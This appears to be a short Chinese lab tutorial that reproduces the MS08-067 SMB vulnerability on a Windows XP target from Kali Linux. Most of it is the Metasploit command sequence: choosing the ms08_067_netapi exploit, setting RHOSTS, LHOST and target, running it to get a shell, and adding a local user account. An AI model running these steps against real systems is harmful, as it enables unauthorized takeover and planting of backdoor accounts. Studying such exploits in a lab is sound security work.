(kali2022)MS08_067漏洞复现
MS08_067漏洞
MS08_067漏洞也是在445端口上被攻击者利用,MS17_010利用的是445端口上的网络共享和远程文件的服务,而这次的MS08_067利用的是在远程调用过程中,函数出现的逻辑性错误,从而造成缓冲区溢出。
1.1 漏洞复现
复现环境
靶机: Windows XP Professional 版本2002 Service Pack 3 IP:192.168.13.122
攻击机: kali-linux-2022-W24-installer-amd64 IP:192.168.13.26
1.2 复现流程
msfconsole

1.3 扫搜漏洞
serach ms08_067

1.4 进入 exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi

1.41 
1.5 进入选项
show options

1.6设置 RHOSTS(目标IP地址) 为192.168.13.122(155是另一个测试截图,一样的)
set RHOSTS 192.168.13.122

1.7设置攻击机的IP(LHOST)地址
set LHOST 192.168.13.26

1.8 查看支持哪些电脑版本
info

1.9设置指定的版本,电脑版本和kali的info里面的版本对应上
set target 74

1.91查看设置的版本

2.0 攻击靶机
run
2.1 进入目标系统 shell
shell

2.2 查看当前用户
net user

2.3
添加一个用户
net user 123123 123123 /add

2.4查看用户
net user



浙公网安备 33010602011771号